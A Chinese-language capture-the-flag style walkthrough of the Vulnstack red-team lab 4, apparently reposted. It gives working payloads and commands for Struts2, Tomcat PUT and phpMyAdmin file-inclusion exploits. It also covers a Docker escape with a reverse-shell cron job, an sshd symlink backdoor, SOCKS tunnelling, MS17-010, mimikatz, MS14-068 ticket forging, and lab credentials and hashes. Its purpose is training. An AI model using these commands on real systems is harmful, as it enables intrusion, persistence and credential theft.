文章目录
-
- 环境搭建
- 官方描述
- 外网信息收集与利用
-
- struts2
- Tomcat
-
- phpmyadmin
-
- CVE-2018-12613 远程文件包含
- 任意命令执行
- 包含session文件
- docker 逃逸
-
- 权限维持
-
- 内网渗透
-
-
- 通过ssh 做 socks代理
- MS17-010
- MS14-068
环境搭建
http://vulnstack.qiyuanxuetang.net/vuln/detail/6/
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第1张图片](http://img.e-com-net.com/image/info8/3a857dcd99164806847654b44e3eadef.jpg)
官方描述
大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞,希望大家多多利用。
红队评估四靶场描述
第一次搭建靶机,如有啥不足或问题,欢迎各位师傅在vlunstack微信群里提出,向师傅们学习
靶场学习路径,可参考
st漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透
环境说明
机器密码
ubuntu:ubuntu域成员机器
douser:Dotest123DC:
administrator:Test2008
环境是在Ubuntu上用docker做的,需要启动docker容器
docker start ec 17 09 bb da 3d ab ad
外网信息收集与利用
ubuntu 端口
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第2张图片](http://img.e-com-net.com/image/info8/25f10fc4f2704aeb9b68159bfcc460fa.jpg)
来看看分别有什么
2001 一个文件上传
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第3张图片](http://img.e-com-net.com/image/info8/31fe190fe0bb4f75955c06a45d7735b5.jpg)
2002 一个tomcat
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第4张图片](http://img.e-com-net.com/image/info8/f0df0cb1054c49b08747e891898be374.jpg)
2003 一个phpmyadmin,这个没有密码就直接进来了。。。
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第5张图片](http://img.e-com-net.com/image/info8/20fdef581506489e9a875f9605dfe33e.jpg)
struts2
先来看看这个文件上传,页面title写的是struts2
直接丢payload检测
S2-045
S2-045
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第6张图片](http://img.e-com-net.com/image/info8/a34904c575db450589f40242a21f3e5a.jpg)
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第7张图片](http://img.e-com-net.com/image/info8/ae7e5034bf7d4aee86f5e3bab4a400ff.jpg)
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第8张图片](http://img.e-com-net.com/image/info8/379d1d66ab7140998846755e65aef755.jpg)
Tomcat
任意文件写入
CVE-2017-12615 任意文件写入
这个漏洞利用需要在windows环境, 需要将readonly 初始化参数由默认值设置为 false,就可以通过构造jsp文件到服务器。
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第9张图片](http://img.e-com-net.com/image/info8/b39383ee5a4d40368fe9836af70ee01b.jpg)
环境是docker做的,这个payload已经不属于CVE-2017-12615的范畴了,这种方式适用于win及linux系统。
Payload
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:2002
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
wpsec
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第10张图片](http://img.e-com-net.com/image/info8/63d5d55eca7d4e64961f2d0c130511d9.jpg)
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第11张图片](http://img.e-com-net.com/image/info8/c1a07b307cda419f9981df73f5e5bc30.jpg)
phpmyadmin
phpmyadmin 4.8.1
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第12张图片](http://img.e-com-net.com/image/info8/af43d3ee206a47bca990a33472952678.jpg)
CVE-2018-12613 远程文件包含
payload
http://192.168.3.103:2003/
?target=tbl_zoom_select.php?/../../../../../../etc/hosts
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第13张图片](http://img.e-com-net.com/image/info8/01aeb9bd9be14a128bd0010a0d88c6c8.jpg)
任意命令执行
这个数据库有一个叫test的数据库,可以向里面任意信息,因为php包含的文件都会以php解析,所以可以写入相应php代码执行任意命令,但是我这里测试没有成功,因为作者这个环境是用的两个docker容器,站库分离。
查看本地数据库路径
创建一个rce表,向表内插入php语句,包含执行
show global variables like "%datadir%";
CREATE TABLE rce(code varchar(100));
INSERT INTO rce(code) VALUES("");
包含session文件
想要包含session文件需要知道存放的session临时文件位置和session命名规则
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第14张图片](http://img.e-com-net.com/image/info8/79a24508a97c493f93be506149a38275.jpg)
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第15张图片](http://img.e-com-net.com/image/info8/c2f6340681d848369c4f4ee8049450b3.jpg)
http://192.168.3.103:2003/index.php?target=db_datadict.php%253f../../../../../../../../../tmp/sess_bbbf00d597f5456ab9fdf0db25ff3912
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第16张图片](http://img.e-com-net.com/image/info8/466e89b23a794276abe7abb0cba6dd26.jpg)
docker 逃逸
通过前面三种漏洞利用都可以getshell
进入后进行信息收集,及判断是否为docker环境
查看ip信息与系统版本
查看.dockerenv 文件
查询系统进程的cgroup信息
非docker环境一般不会有dockerenv文件,但如果dockerfile写的比较好的也有可能没有这个文件。
ls -alh /.dockerenv
cat /proc/1/cgroup
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第17张图片](http://img.e-com-net.com/image/info8/8e98a74866794eee9e39c5570fac1951.jpg)
利用特权模式逃逸
如果是通过特权模式启动容器,就可以获得大量设备文件的访问权限,因为管理员执行docker run —privileged
时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
创建一个文件夹,将宿主机根目录挂载至容器目录下
fdisk -l
mkdir /wpsec
mount /devsda1 /wpsec
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第18张图片](http://img.e-com-net.com/image/info8/e0e471f2f1f140d099cb4075ea76898f.jpg)
写一条nc的计划任务,反向连接回来
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第19张图片](http://img.e-com-net.com/image/info8/48622eb4a03a4a1592fb1bf75614d903.jpg)
sed -i '$a*/2 * * * * root bash /wpsec/var/tmp/root ' /wpsec/etc/crontab
nc -nvlp 12340
另外我尝试了 dirty cow 逃逸,但是没能利用成功
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第20张图片](http://img.e-com-net.com/image/info8/36a30ababbbd4ff49bb0d00ef8f60ae1.jpg)
权限维持
普通root组用户
useradd test1 -g 0 -s /bin/bash
ssh软连接后门
软连后门需要root执行后门命令,任意密码登录
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oport=12345
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第21张图片](http://img.e-com-net.com/image/info8/0caaf7171bde4afdbfef330030eaa1b1.jpg)
内网渗透
进入ubuntu后发现ubuntu还有一张网卡
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第22张图片](http://img.e-com-net.com/image/info8/3a10c638ea994daf8198c0b09a732765.jpg)
通过ssh 做 socks代理
上msf,做正向连接
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=12343 -f elf -o wpsec
转发 ssh 端口
portfwd add -r 127.0.0.1 -p 22 -l 2222
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第23张图片](http://img.e-com-net.com/image/info8/173cd7c6a5a0450aac54ea4330b0a849.jpg)
做 ssh 隧道转发
ssh -f -N -D 127.0.0.1:1080 [email protected] -p 2222
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第24张图片](http://img.e-com-net.com/image/info8/31c1944979d245a7916620554e3b6cd5.jpg)
添加一条 proxychains4 socks代理
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第25张图片](http://img.e-com-net.com/image/info8/79fa10e103c944b0afd2bdf908c715e3.jpg)
通过msf扫描arp查看内弯主机
run post/windows/gather/arp_scanner rhosts=192.168.183.0/24
通过bash查看内网主机
for k in $( seq 1 255);do ping -c 1 192.168.183.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第26张图片](http://img.e-com-net.com/image/info8/1809a0e0bbad49cab92dd527611b54b7.jpg)
在通过 proxychains 扫描内网指定ip
proxychains bash
nmap -sV -sT -Pn -n 192.168.183.129-130
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第27张图片](http://img.e-com-net.com/image/info8/308fdf200ebc4c5a8b1b65d0550c5490.jpg)
作者描述中有提到历史命令信息泄露
但是我找了找,除了作者搭建过程,没发现有用信息
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第28张图片](http://img.e-com-net.com/image/info8/e7f71f96c5d1473196dd7d9c0d0492ee.jpg)
内网共两台主机
192.168.183.130 - Windows Server 2008 R2
192.168.183.129 - Windows 7 - 10 microsoft-ds
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第29张图片](http://img.e-com-net.com/image/info8/2d516db64a024b45ac423387907d076c.jpg)
MS17-010
两台win机器都有17010
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第30张图片](http://img.e-com-net.com/image/info8/2655a95ff6de4f6ebc2408badbeeb297.jpg)
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第31张图片](http://img.e-com-net.com/image/info8/83ee05be09c3452e8ba790e2aa8f942a.jpg)
加载msf自带的kiwi模块抓取密码,但是并没有抓到明文
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第32张图片](http://img.e-com-net.com/image/info8/72f89aee0c704db494f81ae6c2b2348f.jpg)
创建用户分配管理员权限开启RDP
run getgui -u wpsec -p pwd
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第33张图片](http://img.e-com-net.com/image/info8/c8e2a856c32e4c6dade8cbe4ee76131a.jpg)
MS14-068
上传 mimikatz
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第34张图片](http://img.e-com-net.com/image/info8/556cb7281397427daf1a9cebebe1e1f9.jpg)
收集相关信息
USER:douser
Domain:DEMO.COM
NTLM:bc23b0b4d5bf5ff42bc61fb62e13886e
SID:S-1-5-21-979886063-1111900045-1414766810-1107
PASSWORD:Dotest123
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第35张图片](http://img.e-com-net.com/image/info8/6330f9d48d5b4fc2884295fe5ed7dd28.jpg)
上传MS14-068
MS14-068.exe -u [email protected] -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第36张图片](http://img.e-com-net.com/image/info8/83fbc4a1db8f468cb82a9789f0cdb8df.jpg)
通过 mimikatz 导入TGT票据
kerberos::ptc [email protected]
![红日靶场4(转自_abcdef,MS14-068,ssh软连接后门,struct2漏洞,tomacat,phpmyadmin4.8.1,docker逃逸+ssh私钥战法,ssh隧道pwd))_第37张图片](http://img.e-com-net.com/image/info8/5d705735e6574750ae2af368b1120747.jpg)